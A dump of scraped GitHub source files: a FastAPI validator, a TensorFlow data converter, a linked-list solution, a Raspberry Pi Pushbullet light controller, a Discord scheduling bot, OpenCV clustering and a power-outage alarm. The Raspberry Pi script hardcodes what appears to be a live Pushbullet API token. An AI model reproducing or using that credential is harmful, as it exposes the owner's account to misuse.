result\n\n@tracer.wrap()\nasync def request_args(http_request: Request, schema=None, args=None):\n validated_args = {}\n route_name = http_request.scope['route'].name\n\n routeData = schema or app.openapi.get_route(route_name) \n required = []\n schema = {}\n\n #TODO: allow schema param to override openapi file\n\n body = await http_request.body()\n if http_request.method != \"GET\" and len(body):\n request_body = await http_request.json()\n Context(http_request).set('http.request_body', request_body)\n schema_request_body = routeData['requestBody']['content']['application/json']['schema']\n schema = schema_request_body['properties']\n\n if 'required' in schema_request_body:\n required = schema_request_body['required']\n\n else:\n request_body = dict(http_request.query_params)\n for param in routeData['parameters']:\n if param['in'] == 'path':\n continue\n\n schema[param['name']] = param['schema']\n if 'required' in param and param['required']:\n required.append(param['name'])\n \n args = args or {}\n\n\n # preprocess request_body\n for (name,spec) in schema.items():\n if type(spec) is str:\n spec = { 'type': spec }\n \n if name not in request_body:\n if 'default' in spec:\n request_body[name] = spec['default']\n elif name in required:\n raise AppException(\"failed to validate request arg. missing property: \" + name, \n event='ValidateRequest', status_code=400)\n \n if name in request_body:\n val = request_body[name]\n\n try:\n jsonschema.validate(val, spec)\n validated_args[name] = val\n\n except ValidationError as e:\n raise AppException(f\"failed to validate request arg. invalid property: {name}={val} : {e.message}\",\n event='ValidateRequest', status_code=400, data={name: val})\n except Exception as e:\n raise AppException(f\"failed to validate request arg. unknown error: {name}={val} : {str(e)}\",\n event='ValidateRequest', status_code=400, data={name: val})\n\n # rename\n rename_key = 'map_to'\n if name in validated_args and rename_key in spec:\n val = validated_args.pop(name)\n validated_args[spec[rename_key]] = val\n\n\n # append extra args to request body\n for (key,val) in args.items():\n validated_args[key] = val\n \n return validated_args\n\n\n\nclass Thumbnail:\n def __init__(self, token, http_request=None, validated=False, brand=None):\n\n self.token: str = token\n self.validated: bool = validated\n self.http_request: Request = http_request\n self.brand: str = brand\n \n async def args(self, schema=None):\n return await request_args(self.http_request, schema=schema)\n\n @tracer.wrap()\n async def create(token, http_request=None):\n context = Context(http_request)\n context.set('name', http_request.scope['route'].name)\n\n start_time = time.time_ns()\n auth_result = await validate(token, context=context)\n\n brand = auth_result.token_data['brand']\n\n context.set_time('auth.duration', start_time)\n if auth_result.is_valid:\n thumbnail_svc = Thumbnail(\n token=token, \n validated=True, \n http_request=http_request, \n brand=brand\n )\n return thumbnail_svc\n else:\n raise AppException(\n message=f'account does not have valid authorized token: {auth_result.message}: ',\n event='Auth.Ownership',\n status_code=403,\n )\n\n\n async def from_http(http_request):\n token = get_token(http_request) \n return await Thumbnail.create(token=token, http_request=http_request)\n\n async def call(self, action, args=None):\n self.validated = False\n\n if not self.validated:\n auth_result = await validate(self.token)\n self.validated = auth_result.is_valid\n self.brand = auth_result.token_data['brand']\n\n if self.validated:\n if not args:\n args = {}\n\n bifrostService.brand = self.brand\n\n context = Context(self.http_request)\n try:\n start_time = time.time_ns()\n context.set('bifrost.action', action)\n context.set('bifrost.details.request', args)\n result = await bifrostService.call(action, args)\n\n # details - may add config so these are not on by default\n context.set('bifrost.details.response', result)\n context.set('bifrost.status', 1)\n except ResourceNotFoundError as error:\n context.set('bifrost.status', 0)\n raise AppException(f'resource not found: {str(error)}', event='Bifrost.NotFound', status_code=404)\n except Exception as error:\n context.set('bifrost.status', 0)\n raise AppException(str(error), event='Bifrost.Call', exception=error)\n finally:\n context.set_time('bifrost.duration', start_time)\n\n return result\n\n else:\n raise AppException('Failed authorization before Bifrost call', event='Auth.Bifrost', status_code=403)\n","repo_name":"BhanuJogula/test","sub_path":"app/clients/bifrost/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"721149678","text":"\"\"\"Example of Converting TextSum model data.\nUsage:\npython data_convert_example.py --command binary_to_text --in_file data/data --out_file data/text_data\npython data_convert_example.py --command text_to_binary --in_file data/text_data --out_file data/binary_data\npython data_convert_example.py --command binary_to_text --in_file data/binary_data --out_file data/text_data2\ndiff data/text_data2 data/text_data\n\"\"\"\n\nimport struct\nimport sys\n\nimport tensorflow as tf\nfrom tensorflow.core.example import example_pb2\n\nFLAGS = tf.app.flags.FLAGS\ntf.app.flags.DEFINE_string('command', 'binary_to_text',\n 'Either binary_to_text or text_to_binary.'\n 'Specify FLAGS.in_file accordingly.')\ntf.app.flags.DEFINE_string('in_file', '', 'path to file')\ntf.app.flags.DEFINE_string('out_file', '', 'path to file')\n\ndef _binary_to_text():\n reader = open(FLAGS.in_file, 'rb')\n writer = open(FLAGS.out_file, 'w')\n while True:\n len_bytes = reader.read(8)\n if not len_bytes:\n sys.stderr.write('Done reading\\n')\n return\n str_len = struct.unpack('q', len_bytes)[0]\n tf_example_str = struct.unpack('%ds' % str_len, reader.read(str_len))[0]\n tf_example = example_pb2.Example.FromString(tf_example_str)\n examples = []\n for key in tf_example.features.feature:\n examples.append('%s=%s' % (key, tf_example.features.feature[key].bytes_list.value[0]))\n writer.write('%s\\n' % '\\t'.join(examples))\n reader.close()\n writer.close()\n\n\ndef _text_to_binary():\n inputs = open(FLAGS.in_file, 'r').readlines()\n writer = open(FLAGS.out_file, 'wb')\n for inp in inputs:\n tf_example = example_pb2.Example()\n for feature in inp.strip().split('\\t'):\n (k, v) = feature.split('=')\n tf_example.features.feature[k].bytes_list.value.extend([v])\n tf_example_str = tf_example.SerializeToString()\n str_len = len(tf_example_str)\n writer.write(struct.pack('q', str_len))\n writer.write(struct.pack('%ds' % str_len, tf_example_str))\n writer.close()\n\n\ndef main(unused_argv):\n assert FLAGS.command and FLAGS.in_file and FLAGS.out_file\n if FLAGS.command == 'binary_to_text':\n _binary_to_text()\n elif FLAGS.command == 'text_to_binary':\n _text_to_binary()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"TarrySingh/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials","sub_path":"tensorflow_dl_models/research/textsum/data_convert_example.py","file_name":"data_convert_example.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3543,"dataset":"github-code","pt":"43"} +{"seq_id":"20260080263","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n arr=[]\n result=[]\n\n if head==None and head.next==None:\n return head\n while head:\n arr.append(head.val)\n head=head.next\n \n left-=1\n right-=1\n # print(*arr)\n arr[left:right + 1] = arr[left:right + 1][::-1]\n print(*arr)\n for i in range(0,len(arr)):\n arr[i] = ListNode(arr[i])\n for i in range(0,len(arr)-1):\n arr[i].next=arr[i+1]\n print(arr[i].val)\n return arr[0]\n","repo_name":"BiluAilu/A2SV-Practice","sub_path":"Data Structure/Linked List/Reverse Linked List II.py","file_name":"Reverse Linked List II.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20057644400","text":"# Home Automation System : This system detects whether a person has entered into the room or not, or any command has been\r\n# \t\t\t provided or not. When a person enters the room, the IR sensor detects his/her entry and accordingly\r\n#\t\t\t switches on the light. \r\n\r\nimport RPi.GPIO as gpio\r\nimport time\r\nfrom pushbullet import Pushbullet\r\n\r\n\r\n\r\npb = Pushbullet(\"o.vGrPgqzm2rxUzcrnvyZuSbHrr9nYeD8z\")\r\ngpio.setmode(gpio.BOARD)\t\t\r\ngpio.setup(16, gpio.IN)\t\t\t#input from IR sensor\r\ngpio.setup(40, gpio.OUT)\t\t#output to electric bulb\r\ngpio.setwarnings(False)\r\ntime.sleep(1.5)\r\ntry:\r\n\tentered = False\r\n\twhile True:\r\n\t\ttime.sleep(1)\r\n\t\tpushes = pb.get_pushes()\r\n\t\tif ('body' in pushes[0].keys()):\r\n\t\t\tmsg2 = pushes[0]['body']\t\t\t#getting user command\r\n\t\tmsg1 = gpio.input(16)\t\t\t\t\t#waiting for any motion\r\n\t\tprint(msg1)\r\n\t\tif msg1 == True or msg2 == 'On': \r\n\t\t\tentered = True\r\n\t\t\tmsg2 = 'On'\r\n\t\t\tprint('Turning Lights On')\r\n\t\t\tpb.push_note(\"Home Automation System\",\"Light is On!!\")\r\n\t\t\tgpio.output(40, 0)\t\t\t\t#Relay is in NO mode hence low command to switch On\r\n\t\twhile(entered):\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tpushes = pb.get_pushes()\r\n\t\t\tif ('body' in pushes[0].keys()):\r\n\t\t\t\tmsg2 = pushes[0]['body']\r\n\t\t\tif(msg2 == 'Off'):\r\n\t\t\t\tentered = False\r\n\t\t\t\tmsg2 = 'Off'\r\n\t\t\t\tprint('Turning Lights Off')\r\n\t\t\t\tpb.push_note(\"Home Automation System\",\"Light is Off!!\")\r\n\t\t\t\tgpio.output(40, 1)\t\t\t#Relay is in NO mode hence high command to switch Off\r\n\t\t\t\t\r\nfinally:\r\n\tgpio.cleanup()\r\n","repo_name":"Manoranjanmaharana1/Home-Automation","sub_path":"Home Automation.py","file_name":"Home Automation.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"25700115769","text":"# -*- coding: utf-8 -*-\nfrom distutils.core import setup\nimport py2exe\n\noptions = {\n \"bundle_files\": 1, # create singlefile exe\n \"compressed\" : 1, # compress the library archive\n\n}\n\nsetup(\n options = {\"py2exe\": options},\n zipfile = None,\n console = [\"urlutil.py\"]\n)\n","repo_name":"sejoung/urlutil","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74333844290","text":"# class vowels: ## iterator\n# vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n# test: str\n#\n# def __init__(self, text):\n# self.text = text\n# self.index = 0\n#\n# def __iter__(self):\n# return self\n#\n# def __next__(self):\n# if self.index == len(self.text):\n# raise StopIteration\n# idx = self.index\n# self.index += 1\n# if self.text[idx].lower() in self.vowels:\n# return self.text[idx]\n# else:\n# return self.__next__()\n\n# def vowels(text): # generator func\n# vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n# for ch in text:\n# if ch.lower() in vowels:\n# yield ch\n\ndef vowels(text): # generator comprehension\n vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n return (ch for ch in text if ch.lower() in vowels)\n\n\nmy_string = vowels('Abcedifuty0o')\nfor char in my_string:\n print(char)\n","repo_name":"DeanDupalov/Softuni-Python-OOP","sub_path":"iterators_and_generators/lab/03_vowels.py","file_name":"03_vowels.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39206756324","text":"import os\nimport re\nimport io\nimport random\nimport asyncio\nimport discord\nimport requests\nimport schedule\nimport argparse\nimport datetime\nimport urllib.request\nimport urllib.parse\n\nfrom PIL import Image\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nprint(\"Starting..\")\n\nload_dotenv() \nTOKEN = os.getenv('DISCORD_TOKEN')\n\nURL = 'http://studium-bot.braun-oliver.de/studium-bot.php'\n\nbot = commands.Bot(command_prefix='.', description='A Studium Bot to manage Studying')\n \n# https://discordpy.readthedocs.io/en/latest/api.html#discord.TextChannel\n# https://discordpy.readthedocs.io/en/latest/api.html#discord.Guild\n\nmessagesToSend = []\n\ndef getSchedules():\n r = requests.get(URL)\n return [line for line in r.text.split('\\n') if line.strip() != '']\n\nasync def showHelpWrapper(ctx, title, val):\n embedVar = discord.Embed(color=0x00ff00)\n embedVar.add_field(\n name=title, \n value=val, \n inline=False)\n await ctx.send(embed=embedVar)\n\nasync def addScheduleString(str, ctx = None, checkIfExists = False) -> bool:\n \n def split(str):\n def replace(m):\n if m.group().startswith('\"'):\n return m.group()\n return m.group().replace('on', '-on').replace('at', '-at').replace('send', '-send')\n\n str = re.sub(r'\"[^\"]*\"|[^\"]+', replace, str)\n ret = []\n o = \"\"\n doubleOpen = False\n singleOpen = False\n\n for c in str:\n if c == '\"':\n doubleOpen = not doubleOpen\n elif c == \"'\":\n singleOpen = not singleOpen\n elif c == ' ' and not singleOpen and not doubleOpen:\n ret.append(o)\n o = \"\"\n else:\n o += c\n\n return ret + [o]\n \n async def showHelp(error):\n if ctx == None:\n return\n\n title = \"Error in Command: Add \" + error if (error != None) else \"Help for: Add\"\n val = \"\"\"\n usage: .add [-h | -help] on ... at ... send ...\n\n optional arguments:\n -h -help show this help message and exit\n on : Which Day? One of [Mo, [Tu | Di], [We | Mi], [Th | Do], Fr, Sa, [Su | So], every]\n at : What Time? Format like 18:10\n required arguments:\n send : What to Send? \"New Event upcoming! Join us in VC!\"\n\n example command:\n .add on Mo at 18:10 send \"New Event upcoming! Join us in VC!\"\n \"\"\"\n await showHelpWrapper(ctx, title, val)\n\n if '-h' in str or '-help' in str:\n await showHelp(None)\n return False\n \n try:\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument('-on', dest='on')\n parser.add_argument('-at', dest='at')\n parser.add_argument('-send', dest='send', required=True)\n args = parser.parse_args(split(str))\n\n if checkIfExists:\n for line in getSchedules():\n if (f'on {args.on}' in line and f'at {args.at}' in line) or \\\n (f'on {args.on}' in line and args.at == None) or \\\n (args.on == None and f'at {args.at}' in line):\n if ctx != None:\n await ctx.send('Theres already something scheduled at that time, please select another Timepoint.')\n print('Theres already something scheduled at that time, please select another Timepoint.')\n return False\n\n event = schedule.every()\n\n if args.on != None:\n # [Mo, [Tu | Di], [We | Mi], [Th | Do], Fr, Sa, [Su | So], every]\n if args.on == 'Mo':\n event = event.monday\n elif args.on == 'Tu' or args.on == 'Di':\n event = event.tuesday\n elif args.on == 'We' or args.on == 'Mi':\n event = event.wednesday\n elif args.on == 'Th' or args.on == 'Do':\n event = event.thursday\n elif args.on == 'Fr':\n event = event.friday\n elif args.on == 'Sa':\n event = event.saturday\n elif args.on == 'Su' or args.on == 'So':\n event = event.sunday\n elif args.on == 'every':\n event = event.day\n else:\n print('Day not recognized!')\n await showHelp('Day not recognized!')\n \n if args.at != None:\n date = datetime.datetime.strptime(args.at, '%H:%M')\n time = date - datetime.timedelta(hours=1)\n if time.hour > date.hour:\n await showHelp('Hour must be greater than 1 (Sorry)')\n print('Hour must be greater than 1 (Sorry)')\n return False\n\n event = event.at(time.strftime('%H:%M'))\n \n def job(str):\n print(\"Event happended:\", str)\n messagesToSend.append(str)\n\n event.do(job, args.send)\n print(\"added:\", args)\n\n return True\n\n except Exception as e:\n await showHelp('Exception occured (Sorry)')\n print(e)\n return False\n\nasync def reload():\n schedule.clear()\n\n for line in getSchedules():\n if line.strip() != '':\n await addScheduleString(line)\n\n# Using 3rdparty site to render TeX is not\n# the best solution, however CodeCogs site\n# is pretty stable and this method does not\n# require installing LaTeX on local machine.\nasync def load_latex_bytes(calculation) -> io.BytesIO:\n URL = 'https://chart.apis.google.com/chart?cht=tx&chco=white&chs=50&chf=bg,s,00000000&chco=FFFFFFFF&chl={0}'\n query = calculation.replace('%5Cland', '%5Cwedge').replace('%5Clor', '%5Cvee').replace('%5Clnot', '%5Cneg')\n url = URL.format(urllib.parse.quote(query))\n bytes = urllib.request.urlopen(url).read()\n return io.BytesIO(bytes)\n\n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"you..\"))\n print('We have logged in as', bot.user)\n # Load from File\n # TODO based on server ID\n await reload()\n\nclass Schedule(commands.Cog):\n \"\"\"Category documentations\"\"\"\n\n @commands.command(name='add', help='This Command adds a message to be displayed at a specific time!')\n async def addToSchedule(self, ctx, *, arg: str):\n print(\"add\", len(arg.splitlines()))\n \n # Add to Schedule\n for line in arg.splitlines(False):\n line = line.strip('.add ')\n\n added = await addScheduleString(line, ctx, True)\n\n if added == True:\n # Save to File\n requests.post(URL, data = {'schedule':line.strip() + '\\n' })\n await ctx.send('Added!')\n\n await ctx.send('Done!')\n\n @commands.command(name='list', help='Lists all running schedules')\n async def list(self, ctx):\n print(\"list\")\n\n embedVar = discord.Embed(title=\"Schedules\", color=0x00ff00)\n\n def search(line:str):\n d = { \n 'Mo': 1, \n 'Tu': 2, 'Di': 2,\n 'We': 3, 'Mi': 3,\n 'Th': 4, 'Do': 4,\n 'Fr': 5,\n 'Sa': 6,\n 'Su': 7, 'So': 7,\n 'every': 8,\n }\n tokens = line.split()\n key = ''\n if 'on' in tokens:\n key += str(d[tokens[tokens.index('on') + 1]])\n if 'at' in tokens:\n key += ' ' + tokens[tokens.index('at') + 1].rjust(5, '0')\n return key\n \n lines = getSchedules()\n lines.sort(key=search)\n\n schedules = {}\n for line in lines:\n if not 'on' in line:\n if not 'On Time' in schedules:\n schedules['On Time'] = []\n schedules['On Time'].append(line)\n else:\n tokens = line.split()\n idx = tokens.index('on')\n key = 'On ' + tokens[idx + 1]\n tokens = tokens[:idx] + tokens[idx + 2:]\n if not key in schedules:\n schedules[key] = []\n schedules[key].append(' '.join(tokens))\n \n for k, v in schedules.items():\n embedVar.add_field(name=k, value='\\n'.join(v), inline=False)\n await ctx.send(embed=embedVar)\n\n @commands.command(name='clear', help='Clears all running schedules')\n async def clear(self, ctx):\n print(\"clear\")\n requests.post(URL, data = {'clear':'true'})\n schedule.clear()\n await ctx.send(\"Cleared Schedule!\")\n\n @commands.command(name='rem', help='Removes a schedule')\n async def rem(self, ctx, *, arg):\n print(\"rem\")\n\n if '-h' in arg or '-help' in arg:\n title = \"Help for: Rem\"\n val = \"\"\"\n usage: .rem [-h | -help] idx | str\n\n optional arguments:\n -h -help show this help message and exit\n required arguments:\n idx : Index of schedule to be removed (0 based)\n str : String representation of schedule to be removed\n\n example command:\n .rem 0\n .rem on Mo at 18:10 send \"New Event upcoming! Join us in VC!\"\n \"\"\"\n await showHelpWrapper(ctx, title, val)\n return\n \n lines = getSchedules()\n requests.post(URL, data = {'clear':'true'})\n\n idx = int(arg) if arg.isdigit() else None\n removed = False\n for i, line in enumerate(lines):\n if idx != i and line != arg.strip():\n requests.post(URL, data = {'schedule':line + '\\n'})\n else:\n await ctx.send(\"Removed from Schedule!\")\n removed = True\n\n if not removed:\n await ctx.send(\"Nothing Removed from Schedule!\")\n \n # reload remaining schedules\n await reload()\n \n @commands.command(name='reload', help='Reload all Schedules from File')\n async def reload(self, ctx):\n print(\"reload\")\n await reload()\n await ctx.send(\"Reloaded Schedule!\")\n \n @commands.command(name='dump', help='Dumps all Schedules to Chat')\n async def dump(self, ctx):\n print(\"dump\") \n\n data = ''\n for line in getSchedules():\n data += '.add ' + line + '\\n'\n\n embedVar = discord.Embed(color=0x00ff00) \n embedVar.add_field(\n name=\"Schedule Dump\", \n value=data, \n inline=False)\n await ctx.send(embed=embedVar)\n\n @commands.command(name='setup', help='Setup the Bot')\n async def setup(self, ctx):\n print(\"setup\")\n # TODO set channel\n # TODO set prefix\n pass\n\nclass Util(commands.Cog):\n @commands.command(name='display', help='Display information about Server')\n async def display(self, ctx):\n print(\"display\")\n\n embedVar = discord.Embed(title=\"Discord Data\", color=0x00ff00)\n embedVar.add_field(\n name=\"Guild\", \n value=str(ctx.guild) + ' ' + str(ctx.guild.id), \n inline=False)\n embedVar.add_field(\n name=\"Channel\", \n value=str(ctx.channel) + ' ' + str(ctx.channel.id), \n inline=False)\n embedVar.add_field(\n name=\"Author\", \n value=str(ctx.author) + ' ' + str(ctx.me), \n inline=False)\n await ctx.send(embed=embedVar)\n \n @commands.command(name='clearchat', help='Clears Messages of current channel')\n async def clearchat(self, ctx, number = None):\n print(\"clearchat\")\n\n number = 1000 if number == None else int(number) + 1\n await ctx.channel.purge(limit=number)\n \n @commands.command(name='hol', help='Pings provided User in each channel')\n async def hol(self, ctx, user):\n print(\"hol\")\n\n for channel in ctx.guild.text_channels:\n await channel.send(\"Komm mal her \" + user + \"!\")\n \n @commands.command(name='latex', help='Renderes the entered Calculation based on Latex format')\n async def latex(self, ctx, *, calculation):\n print(\"latex\", calculation)\n await ctx.message.delete()\n try:\n bytes = await load_latex_bytes(calculation)\n filename = '{}.png'.format(calculation)\n await ctx.message.channel.send(f'***{ctx.message.author.name}***\\n.latex {calculation}', file=discord.File(bytes, filename=filename))\n except:\n await ctx.send('Failed to Render calculation: ' + calculation)\n\n \nasync def loop():\n while True:\n # Channel bot-notifications\n # TODO Based on server ID -> also only send messages that are supposed to go to that server\n schedule.run_pending()\n\n channel = bot.get_channel(772952750668382238)\n\n for str in messagesToSend:\n print(\"sending\", str)\n await channel.send(str)\n\n messagesToSend.clear()\n \n # sleep until next minute starts\n now = datetime.datetime.now()\n lastMin = now.replace(second=5)\n seconds = max((now - lastMin).seconds, 0)\n # sleep full minute - seconds passed in this minute\n # await asyncio.sleep(60 - seconds)\n await asyncio.sleep(1)\n\n\nbot.loop.create_task(loop())\nbot.add_cog(Schedule())\nbot.add_cog(Util())\nbot.run(TOKEN)\n","repo_name":"BertilBraun/StudiumBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22728319468","text":"from cv2 import (\n imread, adaptiveThreshold, ADAPTIVE_THRESH_MEAN_C, THRESH_BINARY,\n cvtColor, COLOR_BGR2GRAY, COLOR_BGR2RGB, inRange, kmeans,\n TERM_CRITERIA_EPS, TERM_CRITERIA_MAX_ITER, KMEANS_RANDOM_CENTERS\n)\nfrom numpy import dstack, array, uint8, float32\nimport matplotlib.pyplot as plt\n\ndef threshold(image, th):\n return [[0 if cell < th else 255 for cell in row] for row in image]\n\nimg = imread('../resource/fight_club.jpg')\n\ncriteria = (TERM_CRITERIA_MAX_ITER + TERM_CRITERIA_EPS, 10, 1.0)\n\nimg_gray = cvtColor(img, COLOR_BGR2GRAY)\nimg_rgb = cvtColor(img, COLOR_BGR2RGB)\n\nZ = img_rgb.reshape((-1, 3))\n\nret, label, center = kmeans(float32(Z), 2, None, criteria, 8, KMEANS_RANDOM_CENTERS)\n\ncenter = uint8(center)\nres = center[label.flatten()]\nimg_kmean = res.reshape((img_rgb.shape))\n\nret, label, center = kmeans(float32(Z), 4, None, criteria, 8, KMEANS_RANDOM_CENTERS)\n\ncenter = uint8(center)\nres = center[label.flatten()]\nimg_kmean_4 = res.reshape((img_rgb.shape))\n\nimg_rgb_threshold = inRange(img_rgb, array([10, 0, 5]), array([100, 100, 100]))\n\nplt.subplot(231)\nplt.title('Original image')\nplt.imshow(img_rgb)\n\nplt.subplot(232)\nplt.title('K-means clustering (K=2)')\nplt.imshow(img_kmean)\n\nplt.subplot(233)\nplt.title('K-means clustering (K=4)')\nplt.imshow(img_kmean_4)\n\nplt.subplot(234)\nplt.title('Thresholded color image')\nplt.imshow(img_rgb_threshold, cmap='gray')\n\nplt.subplot(235)\nplt.title('Simple thresholding (gray)')\nplt.imshow(threshold(img_gray, 100), cmap='gray')\n\nplt.subplot(236)\nplt.title('Adaptive threshold (gray)')\nplt.imshow(adaptiveThreshold(img_gray, 255, ADAPTIVE_THRESH_MEAN_C, THRESH_BINARY, 25, 12), cmap='gray')\n\nplt.show()\n","repo_name":"Huy-Ngo/DIP-labwork","sub_path":"labwork_2/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39141704137","text":"#/usr/bin/python\n_copyright__ = '''\nCopyright 2020 Andre C. Neto\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n__license__ = 'MIT'\n__author__ = 'Andre C. Neto'\n__date__ = '01/06/2020'\n\nimport argparse\nimport logging\nimport logging.handlers\nimport odroid_wiringpi as wpi\nimport smtplib, ssl\nimport time\n\nfrom enum import Enum\n\n#Configure the logging format\ndateFormat = '%Y-%m-%d %H:%M:%S'\nloggingFormat = logging.Formatter(fmt='[%(asctime)s] [%(levelname)s] [%(process)d] [%(filename)s:%(lineno)d] %(message)s', datefmt=dateFormat)\n\n#Configure the logger\nlogger = logging.getLogger('{0}'.format(__name__))\n\n#Console handler\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(loggingFormat)\n\n#Syslog handler\nsyslogHandler = logging.handlers.SysLogHandler('/dev/log')\nsyslogHandler.setFormatter(loggingFormat)\n\nlogger.addHandler(consoleHandler)\nlogger.addHandler(syslogHandler)\n\n#Possible application states\nclass AlarmState(Enum):\n OK = 1,\n ALARMING_VOLTAGE = 2,\n ALARM = 3\n\n#Template class for alarms\nclass AlarmHandler(object):\n\n def __init__(self):\n #NOOP\n log.critical('NOOP')\n\n def trigger(self, msg, severity):\n #NOOP\n log.critical('Should not be recheable')\n\nclass BuzzerAlarmHandler(AlarmHandler):\n\n def __init__(self, alarmPin, alarmDuration):\n self.tones = [650, 900]\n self.toneDuration = [0.4, 0.6]\n self.duration = alarmDuration\n self.pin = alarmPin\n wpi.pinMode(self.pin, 1)\n\n def trigger(self, msg, severity):\n if (severity >= logging.ERROR):\n logger.info('Triggering buzzer siren')\n wpi.softToneCreate(self.pin)\n startTime = time.time()\n endTime = startTime + self.duration\n while(time.time() < endTime):\n for (toneFrequency, toneDuration) in zip(self.tones, self.toneDuration):\n wpi.softToneWrite(self.pin, toneFrequency)\n time.sleep(toneDuration)\n wpi.softToneStop(self.pin)\n logger.info('Buzzer siren finished')\n\nclass EMailAlarmHandler(AlarmHandler):\n\n def __init__(self, username, password, destination):\n self.emailUsername = username\n self.emailPassword = password\n self.emailDestination = destination\n self.messageSubject = 'Power detector event'\n self.port = 587 \n self.smtpServer = 'smtp.gmail.com'\n self.loggingStrings = {logging.NOTSET: 'NOTSET', logging.DEBUG: 'DEBUG', logging.INFO: 'INFO', logging.WARNING: 'WARNING', logging.ERROR: 'ERROR', logging.CRITICAL: 'CRITICAL'}\n\n def getLoggingString(self, severity):\n ret = self.loggingStrings[logging.NOTSET]\n if (severity in self.loggingStrings):\n ret = self.loggingStrings[severity]\n return ret\n\n def trigger(self, msg, severity):\n try:\n #context = ssl.create_default_context()\n #server = smtplib.SMTP_SSL(smtpServer, port, context)\n \n server = smtplib.SMTP(self.smtpServer, self.port)\n server.ehlo()\n server.starttls()\n server.login(self.emailUsername, self.emailPassword)\n\n message = '\\r\\n'.join([\n 'From: {0}'.format(self.emailUsername),\n 'To: {0}'.format(self.emailDestination.split(',')),\n 'Subject: {0} - {1}'.format(self.messageSubject, self.getLoggingString(severity)),\n '',\n '{0}'.format(msg)\n ])\n server.sendmail(self.emailUsername, self.emailDestination.split(','), message)\n server.quit()\n except Exception as e:\n logger.critical('Failed to send e-mail {0}'.format(e))\n \ndef monitor(adcNumber, readPeriodState, alarmMinVoltage, alarmNTriggers, alarmHandlers, infoPeriod):\n msg = 'Going to read from ADC {0} with a period of {1} seconds. The minimum voltage to trigger an alarm is: {2} and {3} alarms are required to trigger an alarm event'.format(adcNumber, readPeriodState, alarmMinVoltage, alarmNTriggers)\n for handler in alarmHandlers:\n handler.trigger(msg, logging.INFO)\n logger.debug(msg)\n #1.8V => 1023\n ADC_SCALE_TO_V = 1.8 / 1023\n\n #When numberOfAlarmsLeftToTrigger\n numberOfAlarmsLeftToTrigger = alarmNTriggers\n\n #Current state\n alarmState = AlarmState.OK\n\n #Read period\n readPeriod = readPeriodState\n\n #Trigger alarms with information in \n nextInfoTrigger = time.time() + infoPeriod\n logger.info('Going to trigger next information alarm at {0}'.format(time.strftime('%d %b %Y %H:%M:%S', time.gmtime(nextInfoTrigger))))\n\n while True:\n time.sleep(readPeriod)\n readPeriod = readPeriodState\n adcVal = wpi.analogRead(adcNumber)\n adcValVolts = adcVal * ADC_SCALE_TO_V\n statusMsg = 'State: {0} - read from ADC {1} value {2} => {3} (number of alarms to trigger: {4})'.format(alarmState, adcNumber, adcVal, adcValVolts, numberOfAlarmsLeftToTrigger)\n logger.debug(statusMsg)\n if (alarmState == AlarmState.OK):\n if (adcValVolts < alarmMinVoltage):\n logger.warning('Read voltage is less than the minimum voltage: {0} < {1}'.format(adcValVolts, alarmMinVoltage))\n #Force a faster refresh\n readPeriod = 1\n numberOfAlarmsLeftToTrigger = numberOfAlarmsLeftToTrigger - 1\n if (numberOfAlarmsLeftToTrigger < 1):\n alarmState = AlarmState.ALARM\n for handler in alarmHandlers:\n statusMsg = 'State: {0} - read from ADC {1} value {2} => {3} (number of alarms to trigger: {4})'.format(alarmState, adcNumber, adcVal, adcValVolts, numberOfAlarmsLeftToTrigger)\n handler.trigger(statusMsg, logging.CRITICAL)\n else:\n #The alarms must be consecutive\n numberOfAlarmsLeftToTrigger = alarmNTriggers\n else:\n if (adcValVolts < alarmMinVoltage):\n #Reset if still in 